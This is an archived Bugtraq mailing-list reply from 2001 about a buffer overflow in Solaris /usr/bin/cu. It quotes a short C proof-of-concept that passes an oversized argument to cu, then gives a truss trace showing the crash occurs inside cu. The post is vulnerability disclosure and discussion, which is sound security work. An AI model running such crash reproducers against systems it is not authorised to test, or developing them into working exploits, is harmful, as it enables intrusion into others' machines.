[18901] in bugtraq
Re: Solaris /usr/bin/cu Vulnerability
daemon@ATHENA.MIT.EDU (Dan Harkless)
Wed Jan 31 12:24:58 2001
Message-ID: <200101310518.VAA21556@dilvish.speed.net>
Date: Tue, 30 Jan 2001 21:18:32 -0800
Reply-To: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
From: Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: Message from optyx <optyx@UBERHAX0R.NET> of "Tue, 30 Jan 2001
12:01:10 PST."
<Pine.BSO.4.21.0101301154430.6496-100000@pr0n.newhackcity.net>
optyx <optyx@UBERHAX0R.NET> writes:
> Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET> wrote:
> >Are you implying the above patches fix the cu long hardlink name
> >vulnerability? This is not the case, at least on 2.6:
> >
> > # cat > cu_exploit.c
> > #include <stdio.h>
> >
> > void main(int argc,char **argv)
> > {
> > char *buf;
> >
> > buf = (char *) malloc(atoi(argv[1])*sizeof(char));
> > memset(buf,0x41,atoi(argv[1])-1);
> > buf[atoi(argv[1])-1]=0;
> > execl("/usr/bin/cu",buf,(char *)0);
> > }
> > # gcc cu_exploit.c
> > cu_exploit.c: In function `main':
> > cu_exploit.c:4: warning: return type of `main' is not `int'
> > # a.out
> > Segmentation fault
>
> see that atoi(argv[1])? a.out crashed not /usr/bin/cu. try a.out 4000 or
> whatever number next time, or trace through it with gdb.
Right, sorry. I had the 4000 (actually 40000 -- didn't crash with only
4000) in there when I was running it originally but forgot to include it in
my proof-of-concept session. Here's the correct version (ellipsis in the
Usage and \-line-wrapping mine):
# a.out 4000
Usage: AAA[...]AAA [-dhtnLC] [-c device] [-s speed] [-l line] [-b 7|8]
[-o | -e] telno | systemname [local-cmd]
# a.out 40000
Segmentation Fault
# truss a.out 40000
execve("./a.out", 0xEFFFFC98, 0xEFFFFCA4) argc = 2
open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF7B0000
stat("a.out", 0xEFFFF998) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libc.so.1", O_RDONLY) = 4
fstat(4, 0xEFFFF734) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF7A0000
mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF6C0000
mmap(0xEF763000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF763000
mmap(0xEF76A000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF76A000
munmap(0xEF754000, 61440) = 0
memcntl(0xEF6C0000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libdl.so.1", O_RDONLY) = 4
fstat(4, 0xEFFFF734) = 0
mmap(0xEF7A0000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF7A0000
close(4) = 0
open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\
Err#2 ENOENT
close(3) = 0
brk(0x00020BA0) = 0
brk(0x0002ABA0) = 0
execve("/usr/bin/cu", 0xEFFFFBB8, 0xEFFFFCB0) argc = 1
open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 40960, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF7B0000
stat("/usr/bin/cu", 0xEFFF5D60) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF7A0000
open("/usr/local/lib/libnsl.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libnsl.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF790000
mmap(0x00000000, 581632, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF700000
mmap(0xEF780000, 32812, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 458752) = 0xEF780000
mmap(0xEF789000, 19976, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF789000
munmap(0xEF771000, 61440) = 0
memcntl(0xEF700000, 70140, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libsocket.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libsocket.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF790000
mmap(0x00000000, 102400, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF6E0000
mmap(0xEF6F7000, 4089, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xEF6F7000
mmap(0xEF6F8000, 388, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6F8000
munmap(0xEF6E8000, 61440) = 0
memcntl(0xEF6E0000, 12072, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libc.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libc.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF790000
mmap(0x00000000, 704512, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF600000
mmap(0xEF6A3000, 25888, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 602112) = 0xEF6A3000
mmap(0xEF6AA000, 4144, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xEF6AA000
munmap(0xEF694000, 61440) = 0
memcntl(0xEF600000, 101660, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
open("/usr/local/lib/libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libdl.so.1", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0xEF790000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0)\
= 0xEF790000
close(4) = 0
open("/usr/local/lib/libmp.so.2", O_RDONLY) Err#2 ENOENT
open("/usr/lib/libmp.so.2", O_RDONLY) = 4
fstat(4, 0xEFFF5AFC) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xEF6D0000
mmap(0x00000000, 77824, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =\
0xEF5E0000
mmap(0xEF5F2000, 3581, PROT_READ|PROT_WRITE|PROT_EXEC,\
MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xEF5F2000
munmap(0xEF5E3000, 61440) = 0
memcntl(0xEF5E0000, 3020, MC_ADVISE, 0x0003, 0, 0) = 0
close(4) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3,\
0) = 0xEF6C0000
open("/usr/platform/SUNW,SPARCstation-5/lib/libc_psr.so.1", O_RDONLY)\
Err#2 ENOENT
close(3) = 0
munmap(0xEF6D0000, 4096) = 0
Incurred fault #6, FLTBOUNDS %pc = 0xEF624694
siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x00038000
*** process killed ***
As you can see, exec() has passed control over to /usr/bin/cu when we seg
fault.
----------------------------------------------------------------------
Dan Harkless | To prevent SPAM contamination, please
dan-bugtraq@dilvish.speed.net | do not mention this private email
SpeedGate Communications, Inc. | address in Usenet posts. Thank you.
